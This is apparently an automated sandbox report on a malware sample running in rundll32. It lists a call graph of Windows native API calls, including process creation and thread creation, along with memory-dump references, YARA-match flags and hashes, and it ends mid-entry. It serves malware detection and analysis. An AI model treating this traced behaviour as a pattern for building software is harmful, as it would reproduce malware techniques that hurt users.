8788bc RtlAllocateHeap 33066->33067 33067->33064 33069 8788a0 2 API calls 33068->33069 33070 87a278 33068->33070 33069->33070 33070->33037 33072 8791d0 LdrLoadDll 33071->33072 33073 87869c NtReadFile 33072->33073 33073->33038 33075 879e84 33074->33075 33076 879e6d 33074->33076 33075->33049 33076->33075 33077 87a260 2 API calls 33076->33077 33078 879e9b 33077->33078 33078->33049 33079->33039 33080->33026 33082 873061 33081->33082 33084 873069 33081->33084 33082->32972 33083 87333c 33083->32972 33084->33083 33208 87b240 33084->33208 33086 8730bd 33087 87b240 2 API calls 33086->33087 33091 8730c8 33087->33091 33088 873116 33090 87b240 2 API calls 33088->33090 33094 87312a 33090->33094 33091->33088 33092 87b370 3 API calls 33091->33092 33222 87b2e0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33091->33222 33092->33091 33093 873187 33095 87b240 2 API calls 33093->33095 33094->33093 33213 87b370 33094->33213 33096 87319d 33095->33096 33098 8731da 33096->33098 33100 87b370 3 API calls 33096->33100 33099 87b240 2 API calls 33098->33099 33101 8731e5 33099->33101 33100->33096 33102 87b370 3 API calls 33101->33102 33109 87321f 33101->33109 33102->33101 33105 87b2a0 2 API calls 33106 87331e 33105->33106 33107 87b2a0 2 API calls 33106->33107 33108 873328 33107->33108 33110 87b2a0 2 API calls 33108->33110 33219 87b2a0 33109->33219 33111 873332 33110->33111 33112 87b2a0 2 API calls 33111->33112 33112->33083 33114 874391 33113->33114 33115 873a40 8 API calls 33114->33115 33117 8743a7 33115->33117 33116 8743fa 33116->32976 33117->33116 33118 8743f5 33117->33118 33119 8743e2 33117->33119 33121 87a090 2 API calls 33118->33121 33120 87a090 2 API calls 33119->33120 33122 8743e7 33120->33122 33121->33116 33122->32976 33124 878ff4 33123->33124 33125 878ea0 LdrLoadDll 33123->33125 33223 878ea0 33124->33223 33125->33124 33128 878ea0 LdrLoadDll 33129 879006 33128->33129 33130 878ea0 LdrLoadDll 33129->33130 33131 87900f 33130->33131 33132 878ea0 LdrLoadDll 33131->33132 33133 879018 33132->33133 33134 878ea0 LdrLoadDll 33133->33134 33135 879021 33134->33135 33136 878ea0 LdrLoadDll 33135->33136 33137 87902d 33136->33137 33138 878ea0 LdrLoadDll 33137->33138 33139 879036 33138->33139 33140 878ea0 LdrLoadDll 33139->33140 33141 87903f 33140->33141 33142 878ea0 LdrLoadDll 33141->33142 33143 879048 33142->33143 33144 878ea0 LdrLoadDll 33143->33144 33145 879051 33144->33145 33146 878ea0 LdrLoadDll 33145->33146 33147 87905a 33146->33147 33148 878ea0 LdrLoadDll 33147->33148 33149 879066 33148->33149 33150 878ea0 LdrLoadDll 33149->33150 33151 87906f 33150->33151 33152 878ea0 LdrLoadDll 33151->33152 33153 879078 33152->33153 33154 878ea0 LdrLoadDll 33153->33154 33155 879081 33154->33155 33156 878ea0 LdrLoadDll 33155->33156 33157 87908a 33156->33157 33158 878ea0 LdrLoadDll 33157->33158 33159 879093 33158->33159 33160 878ea0 LdrLoadDll 33159->33160 33161 87909f 33160->33161 33162 878ea0 LdrLoadDll 33161->33162 33163 8790a8 33162->33163 33164 878ea0 LdrLoadDll 33163->33164 33165 8790b1 33164->33165 33166 878ea0 LdrLoadDll 33165->33166 33167 8790ba 33166->33167 33168 878ea0 LdrLoadDll 33167->33168 33169 8790c3 33168->33169 33170 878ea0 LdrLoadDll 33169->33170 33171 8790cc 33170->33171 33172 878ea0 LdrLoadDll 33171->33172 33173 8790d8 33172->33173 33174 878ea0 LdrLoadDll 33173->33174 33175 8790e1 33174->33175 33176 878ea0 LdrLoadDll 33175->33176 33177 8790ea 33176->33177 33178 878ea0 LdrLoadDll 33177->33178 33179 8790f3 33178->33179 33180 878ea0 LdrLoadDll 33179->33180 33181 8790fc 33180->33181 33182 878ea0 LdrLoadDll 33181->33182 33183 879105 33182->33183 33184 878ea0 LdrLoadDll 33183->33184 33185 879111 33184->33185 33186 878ea0 LdrLoadDll 33185->33186 33187 87911a 33186->33187 33188 878ea0 LdrLoadDll 33187->33188 33189 879123 33188->33189 33190 878ea0 LdrLoadDll 33189->33190 33191 87912c 33190->33191 33192 878ea0 LdrLoadDll 33191->33192 33193 879135 33192->33193 33194 878ea0 LdrLoadDll 33193->33194 33195 87913e 33194->33195 33196 878ea0 LdrLoadDll 33195->33196 33197 87914a 33196->33197 33198 878ea0 LdrLoadDll 33197->33198 33199 879153 33198->33199 33200 878ea0 LdrLoadDll 33199->33200 33201 87915c 33200->33201 33201->32980 33203 8791d0 LdrLoadDll 33202->33203 33204 87814c 33203->33204 33229 4839860 LdrInitializeThunk 33204->33229 33205 878163 33205->32911 33207->32977 33209 87b256 33208->33209 33210 87b250 33208->33210 33211 87a260 2 API calls 33209->33211 33210->33086 33212 87b27c 33211->33212 33212->33086 33214 87b2e0 33213->33214 33215 87a260 2 API calls 33214->33215 33216 87b33d 33214->33216 33217 87b31a 33215->33217 33216->33094 33218 87a090 2 API calls 33217->33218 33218->33216 33220 87a090 2 API calls 33219->33220 33221 873314 33220->33221 33221->33105 33222->33091 33224 878ebb 33223->33224 33225 873e40 LdrLoadDll 33224->33225 33226 878edb 33225->33226 33227 873e40 LdrLoadDll 33226->33227 33228 878f87 33226->33228 33227->33228 33228->33128 33229->33205 33231 483968f LdrInitializeThunk 33230->33231 33232 4839681 33230->33232 33231->32986 33232->32986 33234 8791d0 LdrLoadDll 33233->33234 33235 8788fc RtlFreeHeap 33234->33235 33235->32990 33237 866e30 33236->33237 33238 866e2b 33236->33238 33239 87a010 2 API calls 33237->33239 33238->32919 33245 866e55 33239->33245 33240 866eb8 33240->32919 33241 878130 2 API calls 33241->33245 33242 866ebe 33244 866ee4 33242->33244 33246 878830 2 API calls 33242->33246 33244->32919 33245->33240 33245->33241 33245->33242 33247 87a010 2 API calls 33245->33247 33252 878830 33245->33252 33248 866ed5 33246->33248 33247->33245 33248->32919 33250 8670fe 33249->33250 33251 878830 2 API calls 33249->33251 33250->32876 33251->33250 33253 8791d0 LdrLoadDll 33252->33253 33254 87884c 33253->33254 33257 48396e0 LdrInitializeThunk 33254->33257 33255 878863 33255->33245 33257->33255 33259 879833 33258->33259 33260 869b30 LdrLoadDll 33259->33260 33261 868a6b 33260->33261 33261->32884 33263 869ea3 33262->33263 33265 869f20 33263->33265 33277 877f00 LdrLoadDll 33263->33277 33265->32889 33267 8791d0 LdrLoadDll 33266->33267 33268 86cf9b 33267->33268 33268->32897 33269 878a40 33268->33269 33270 8791d0 LdrLoadDll 33269->33270 33271 878a5f LookupPrivilegeValueW 33270->33271 33271->32893 33273 8784ec 33272->33273 33274 8791d0 LdrLoadDll 33272->33274 33278 4839910 LdrInitializeThunk 33273->33278 33274->33273 33275 87850b 33275->32894 33277->33265 33278->33275 33280 86a027 33279->33280 33281 869e80 LdrLoadDll 33280->33281 33282 86a056 33281->33282 33282->32835 33284 869d74 33283->33284 33337 877f00 LdrLoadDll 33284->33337 33286 869dae 33286->32837 33288 86d18c 33287->33288 33289 86a000 LdrLoadDll 33288->33289 33290 86d19e 33289->33290 33338 86d070 33290->33338 33293 86d1b9 33294 878700 2 API calls 33293->33294 33296 86d1c4 33293->33296 33294->33296 33295 86d1d1 33297 878700 2 API calls 33295->33297 33298 86d1e2 33295->33298 33296->32840 33297->33298 33298->32840 33300 86aed6 33299->33300 33301 86aee0 33299->33301 33300->32849 33302 869e80 LdrLoadDll 33301->33302 33303 86af51 33302->33303 33304 869d50 LdrLoadDll 33303->33304 33305 86af65 33304->33305 33306 86af88 33305->33306 33307 869e80 LdrLoadDll 33305->33307 33306->32849 33308 86afa4 33307->33308 33309 873a40 8 API calls 33308->33309 33310 86aff9 33309->33310 33310->32849 33312 86ba56 33311->33312 33313 869e80 LdrLoadDll 33312->33313 33314 86ba6a 33313->33314 33357 86b720 33314->33357 33316 867f8c 33335 86b010 LdrLoadDll 33316->33335 33387 86d420 33317->33387 33319 867e31 33319->32861 33320 867c83 33320->33319 33392 873390 33320->33392 33322 867ce2 33322->33319 33395 867a20 33322->33395 33325 87b240 2 API calls 33326 867d29 33325->33326 33327 87b370 3 API calls 33326->33327 33333 867d3e 33327->33333 33328 866e20 4 API calls 33328->33333 33332 8670e0 2 API calls 33332->33333 33333->33319 33333->33328 33333->33332 33400 86abf0 33333->33400 33450 86d3c0 33333->33450 33454 86cea0 21 API calls 33333->33454 33334->32845 33335->32854 33336->32859 33337->33286 33339 86d08a 33338->33339 33347 86d140 33338->33347 33340 869e80 LdrLoadDll 33339->33340 33341 86d0ac 33340->33341 33348 8781b0 33341->33348 33343 86d0ee 33351 8781f0 33343->33351 33346 878700 2 API calls 33346->33347 33347->33293 33347->33295 33349 8791d0 LdrLoadDll 33348->33349 33350 8781cc 33349->33350 33350->33343 33352 87820c 33351->33352 33353 8791d0 LdrLoadDll 33351->33353 33356 4839fe0 LdrInitializeThunk 33352->33356 33353->33352 33354 86d134 33354->33346 33356->33354 33358 86b737 33357->33358 33366 86d460 33358->33366 33363 86b7b2 33363->33316 33365 86b7c5 33365->33316 33367 86d485 33366->33367 33379 867120 33367->33379 33369 86b77f 33374 878950 33369->33374 33370 873a40 8 API calls 33372 86d4a9 33370->33372 33372->33369 33372->33370 33373 87a090 2 API calls 33372->33373 33386 86d2a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 33372->33386 33373->33372 33375 87896f CreateProcessInternalW 33374->33375 33376 8791d0 LdrLoadDll 33374->33376 33377 86b7ab 33375->33377 33376->33375 33377->33363 33378 878510 LdrLoadDll 33377->33378 33378->33365 33380 86721f 33379->33380 33381 867135 33379->33381 33380->33372 33381->33380 33382 873a40 8 API calls 33381->33382 33383 8671a2 33382->33383 33384 87a090 2 API calls 33383->33384 33385 8671c9 33383->33385 33384->33385 33385->33372 33386->33372 33388 86d43f 33387->33388 33389 873e40 LdrLoadDll 33387->33389 33390 86d446 SetErrorMode 33388->33390 33391 86d44d 33388->33391 33389->33388 33390->33391 33391->33320 33455 86d1f0 33392->33455 33394 8733b6 33394->33322 33396 87a010 2 API calls 33395->33396 33399 867a45 33395->33399 33396->33399 33397 867c5a 33397->33325 33399->33397 33475 877af0 33399->33475 33401 86ac0f 33400->33401 33402 86ac09 33400->33402 33532 868620 33401->33532 33523 86ccb0 33402->33523 33405 86ac1c 33406 87b370 3 API calls 33405->33406 33449 86aea8 33405->33449 33407 86ac38 33406->33407 33408 86ac4c 33407->33408 33409 86d3c0 2 API calls 33407->33409 33541 877f80 33408->33541 33409->33408 33412 878170 2 API calls 33414 86acca 33412->33414 33413 86ad76 33558 86ab90 LdrLoadDll LdrInitializeThunk 33413->33558 33414->33413 33420 86acd6 33414->33420 33416 86ad95 33417 86ad9d 33416->33417 33559 86ab00 LdrLoadDll NtClose LdrInitializeThunk 33416->33559 33418 878700 2 API calls 33417->33418 33422 86ada7 33418->33422 33421 86ad1f 33420->33421 33424 878280 2 API calls 33420->33424 33420->33449 33425 878700 2 API calls 33421->33425 33422->33333 33423 86adbf 33423->33417 33426 86adc6 33423->33426 33424->33421 33427 86ad3c 33425->33427 33429 86adde 33426->33429 33560 86aa80 LdrLoadDll LdrInitializeThunk 33426->33560 33545 8775a0 33427->33545 33561 878000 LdrLoadDll 33429->33561 33430 86ad53 33430->33449 33548 867280 33430->33548 33433 86adf2 33562 86a900 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33433->33562 33437 86ae16 33438 86ae63 33437->33438 33563 878030 LdrLoadDll 33437->33563 33565 878090 LdrLoadDll 33438->33565 33441 86ae34 33441->33438 33564 8780c0 LdrLoadDll 33441->33564 33442 86ae71 33443 878700 2 API calls 33442->33443 33444 86ae7b 33443->33444 33446 878700 2 API calls 33444->33446 33447 86ae85 33446->33447 33448 867280 3 API calls 33447->33448 33447->33449 33448->33449 33449->33333 33451 86d3d3 33450->33451 33636 878100 33451->33636 33454->33333 33456 86d20d 33455->33456 33462 878230 33456->33462 33459 86d255 33459->33394 33463 878246 33462->33463 33464 8791d0 LdrLoadDll 33463->33464 33465 87824c 33464->33465 33473 48399a0 LdrInitializeThunk 33465->33473 33466 86d24e 33466->33459 33468 878280 33466->33468 33469 8791d0 LdrLoadDll 33468->33469 33470 87829c 33469->33470 33474 4839780 LdrInitializeThunk 33470->33474 33471 86d27e 33471->33394 33473->33466 33474->33471 33476 87a260 2 API calls 33475->33476 33477 877b07 33476->33477 33496 868160 33477->33496 33479 877b22 33480 877b60 33479->33480 33481 877b49 33479->33481 33483 87a010 2 API calls 33480->33483 33482 87a090 2 API calls 33481->33482 33484 877b56 33482->33484 33485 877b9a 33483->33485 33484->33397 33486 87a010 2 API calls 33485->33486 33487 877bb3 33486->33487 33493 877e54 33487->33493 33502 87a050 LdrLoadDll 33487->33502 33489 877e39 33490 877e40 33489->33490 33489->33493 33491 87a090 2 API calls 33490->33491 33492 877e4a 33491->33492 33492->33397 33494 87a090 2 API calls 33493->33494 33495 877ea9 33494->33495 33495->33397 33497 868185 33496->33497 33498 869b30 LdrLoadDll 33497->33498 33499 8681b8 33498->33499 33501 8681dd 33499->33501 33503 86b330 33499->33503 33501->33479 33502->33489 33504 86b35c 33503->33504 33505 878450 LdrLoadDll 33504->33505 33506 86b375 33505->33506 33507 86b37c 33506->33507 33514 878490 33506->33514 33507->33501 33511 86b3b7 33512 878700 2 API calls 33511->33512 33513 86b3da 33512->33513 33513->33501 33515 8784ac 33514->33515 33516 8791d0 LdrLoadDll 33514->33516 33522 4839710 LdrInitializeThunk 33515->33522 33516->33515 33517 86b39f 33517->33507 33519 878a80 33517->33519 33520 8791d0 LdrLoadDll 33519->33520 33521 878a9f 33520->33521 33521->33511 33522->33517 33524 86ccc7 33523->33524 33566 86bda0 33523->33566 33531 86cce0 33524->33531 33579 863d70 33524->33579 33526 87a260 2 API calls 33528 86ccee 33526->33528 33528->33401 33529 86ccda 33603 877420 33529->33603 33531->33526 33533 86863b 33532->33533 33534 86d070 3 API calls 33533->33534 33540 86875b 33533->33540 33535 86873c 33534->33535 33536 86876a 33535->33536 33537 868751 33535->33537 33538 878700 2 API calls 33535->33538 33536->33405 33635 865ea0 LdrLoadDll 33537->33635 33538->33537 33540->33405 33542 877f89 33541->33542 33543 8791d0 LdrLoadDll 33542->33543 33544 86aca0 33543->33544 33544->33412 33544->33413 33544->33449 33546 86d3c0 2 API calls 33545->33546 33547 8775d2 33546->33547 33547->33430 33549 867298 33548->33549 33550 869b30 LdrLoadDll 33549->33550 33551 8672b3 33550->33551 33552 873e40 LdrLoadDll 33551->33552 33553 8672c3 33552->33553 33554 8672fd 33553->33554 33555 8672cc PostThreadMessageW 33553->33555 33554->33333 33555->33554 33556 8672e0 33555->33556 33557 8672ea PostThreadMessageW 33556->33557 33557->33554 33558->33416 33559->33423 33560->33429 33561->33433 33562->33437 33563->33441 33564->33438 33565->33442 33567 86bdd3 33566->33567 33608 86a140 33567->33608 33569 86bde5 33612 86a2b0 33569->33612 33571 86be03 33572 86a2b0 LdrLoadDll 33571->33572 33573 86be19 33572->33573 33574 86d1f0 3 API calls 33573->33574 33575 86be3d 33574->33575 33576 86be44 33575->33576 33577 87a2a0 2 API calls 33575->33577 33576->33524 33578 86be54 33577->33578 33578->33524 33580 863d96 33579->33580 33581 86b330 3 API calls 33580->33581 33583 863e61 33581->33583 33582 863e68 33582->33529 33583->33582 33615 87a2e0 33583->33615 33585 863ec9 33586 869e80 LdrLoadDll 33585->33586 33587 863fd3 33586->33587 33588 869e80 LdrLoadDll 33587->33588 33589 863ff7 33588->33589 33619 86b3f0 33589->33619 33593 864083 33594 87a010 2 API calls 33593->33594 33595 864110 33594->33595 33596 87a010 2 API calls 33595->33596 33598 86412a 33596->33598 33597 8642a6 33597->33529 33598->33597 33599 869e80 LdrLoadDll 33598->33599 33600 86416a 33599->33600 33601 869d50 LdrLoadDll 33600->33601 33602 86420a 33601->33602 33602->33529 33604 873e40 LdrLoadDll 33603->33604 33605 877441 33604->33605 33606 877467 33605->33606 33607 877454 CreateThread 33605->33607 33606->33531 33607->33531 33609 86a167 33608->33609 33610 869e80 LdrLoadDll 33609->33610 33611 86a1a3 33610->33611 33611->33569 33613 869e80 LdrLoadDll 33612->33613 33614 86a2c9 33612->33614 33613->33614 33614->33571 33616 87a2ed 33615->33616 33617 873e40 LdrLoadDll 33616->33617 33618 87a300 33617->33618 33618->33585 33620 86b415 33619->33620 33628 878300 33620->33628 33623 878390 33624 8791d0 LdrLoadDll 33623->33624 33625 8783ac 33624->33625 33634 4839650 LdrInitializeThunk 33625->33634 33626 8783cb 33626->33593 33629 8791d0 LdrLoadDll 33628->33629 33630 87831c 33629->33630 33633 48396d0 LdrInitializeThunk 33630->33633 33631 86405c 33631->33593 33631->33623 33633->33631 33634->33626 33635->33540 33637 8791d0 LdrLoadDll 33636->33637 33638 87811c 33637->33638 33641 4839840 LdrInitializeThunk 33638->33641 33639 86d3fe 33639->33333 33641->33639

                                                                        Executed Functions

                                                                        Function 008785CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 380 8785ca-8785cf 381 878626 380->381 382 8785d1-8785dc 380->382 383 8785dd-878621 call 8791d0 NtCreateFile 381->383 384 878628 381->384 382->383 384->381
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00873BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00873BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0087861D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 1c2a0bddeb46ef1adb41017954a8f578cd597852df9ce82510ab8d41475c7f1c
                                                                        • Instruction ID: 26eaafaf9f57ece973033940bcf1e149f5ae6bb9abf3394851caa4782b09d9c4
                                                                        • Opcode Fuzzy Hash: 1c2a0bddeb46ef1adb41017954a8f578cd597852df9ce82510ab8d41475c7f1c
                                                                        • Instruction Fuzzy Hash: 9E010CB6249248AFCB04CF98DC85DDB37A9FF9C314F158148F90D97245D630E9118BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008785D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 388 8785d0-8785e6 389 8785ec-878621 NtCreateFile 388->389 390 8785e7 call 8791d0 388->390 390->389
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00873BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00873BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0087861D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 73450f4e8b98161ce2ea8d1137592a70306a1dd72cbfeb4cd2b43fe55d7e40f3
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: 2CF0BDB2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0087867A Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00873D62,5E972F65,FFFFFFFF,00873A21,?,?,00873D62,?,00873A21,FFFFFFFF,5E972F65,00873D62,?,00000000), ref: 008786C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 2dd9efbf1bb541154e97de16461fab44cac4a5ec6a920551223ed818cb06fb77
                                                                        • Instruction ID: 4f8a47e6e245e7c6e9c156f65a89b81311160ac4cec1bf8ef113ae2373a03590
                                                                        • Opcode Fuzzy Hash: 2dd9efbf1bb541154e97de16461fab44cac4a5ec6a920551223ed818cb06fb77
                                                                        • Instruction Fuzzy Hash: CFF0E2B6200208AFCB58CF89CC84EEB77A9FF8C314F018259BA0D97241D630E911CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878680 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00873D62,5E972F65,FFFFFFFF,00873A21,?,?,00873D62,?,00873A21,FFFFFFFF,5E972F65,00873D62,?,00000000), ref: 008786C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 07f56e61dab0564f1223c65be5ec0a298b7a3e2098323bce13012b64e73ceb37
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 9BF0A4B2200208ABCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008786CB Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00873D62,5E972F65,FFFFFFFF,00873A21,?,?,00873D62,?,00873A21,FFFFFFFF,5E972F65,00873D62,?,00000000), ref: 008786C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: f53e68a941d2eeac2a47074bb65c904a53c7e29491f20de4ec7e2b56f7827de5
                                                                        • Instruction ID: 40a0f7925b2d74f9b10f21fb1792e5ec39951b47f47af8334264f9185f10624f
                                                                        • Opcode Fuzzy Hash: f53e68a941d2eeac2a47074bb65c904a53c7e29491f20de4ec7e2b56f7827de5
                                                                        • Instruction Fuzzy Hash: 62F0B7B6204149AFCB04DF99DC94DEB77ADFF8C314B198649FA4D93605C634E851CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008787AA Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00862D11,00002000,00003000,00000004), ref: 008787E9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 73a1a94045c19f58df4410ef690d5e3aff3a91d7b6b68b370cc8d049f46b8b6e
                                                                        • Instruction ID: 1901422c8e6048080a9c3dd26a4ad774644322d2273dee1685c16867c92b925e
                                                                        • Opcode Fuzzy Hash: 73a1a94045c19f58df4410ef690d5e3aff3a91d7b6b68b370cc8d049f46b8b6e
                                                                        • Instruction Fuzzy Hash: 69F034B1600209AFCB18CF88CC81EEB77A9AF88640F118229FE0897241C230E811CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008787B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00862D11,00002000,00003000,00000004), ref: 008787E9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: da111f6c608288e29398a99ce191bffeb11c7694411e820878db2b052a5a9a94
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 10F015B2200208ABCB18DF89CC81EAB77ADEF88750F118148FE0897241C630F810CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00878700 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00873D40,?,?,00873D40,00000000,FFFFFFFF), ref: 00878725
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_860000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 3c012d50dd23f151919dee39ffb99a5145b211778f0e19b6f86dffa6ada881eb
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: D8D01776200218ABD714EB98CC89EA77BACEF48760F158499BA5C9B242C570FA1086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 048395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 803c021acc3189047cd60662a4bea28454e4c6a2727a298653fc429bc7c11804
                                                                        • Instruction ID: 45b19aa565ef90c5ed5fdc55d494fcffabb7684fd160c178d494c1206a4fc44d
                                                                        • Opcode Fuzzy Hash: 803c021acc3189047cd60662a4bea28454e4c6a2727a298653fc429bc7c11804
                                                                        • Instruction Fuzzy Hash: 669002A130200403610571594414616404A97E0245B51C521E20096E0DC569D8957165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04839540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                        • Associated: 0000000B.00000002.948820864.00000000048EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_47d0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
